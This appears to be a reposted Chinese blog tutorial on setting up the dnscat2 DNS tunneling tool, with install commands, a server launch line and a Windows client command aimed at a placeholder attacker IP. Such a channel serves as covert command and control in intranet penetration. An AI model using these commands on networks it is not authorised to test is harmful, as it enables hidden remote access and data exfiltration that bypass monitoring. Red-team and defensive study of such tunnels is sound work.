DNS隧道--dnscat2

Posted mrhonest

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了DNS隧道--dnscat2相关的知识,希望对你有一定的参考价值。

安装

  • 服务端
 git clone https://github.com/iagox86/dnscat2.git
 cd dnscat2
 cd server
 sudo gem install bundler
 bundle install
  • 客户端
 git clone https://github.com/iagox86/dnscat2.git
 cd dnscat2/client/
 make

*** 服务端和客户端均有编译好的 ***

运行

直连

  • 服务端
ruby ./dnscat2.rb --dns "domain=localhost,host=127.0.0.1,port=53" --no-cache

技术图片

  • 客户端
dnscat2-v0.07-client-win32.exe --dns server=攻击者的IP --secret=攻击者服务器生成的ID

技术图片

DNS

  • 服务端

  • 客户端

    dnscat2-v0.07-client-win32.exe --dns server=攻击者的IP --secret=攻击者服务器生成的ID

以上是关于DNS隧道--dnscat2的主要内容,如果未能解决你的问题,请参考以下文章

内网渗透系列:内网隧道之dnscat2

内网渗透系列:内网隧道之DNS隧道

内网渗透系列:内网隧道之DNS隧道

DNS隧道小结

DNS隧道工具iodine

安全牛学习笔记DNS协议隧道DNS协议隧道-dns2tcp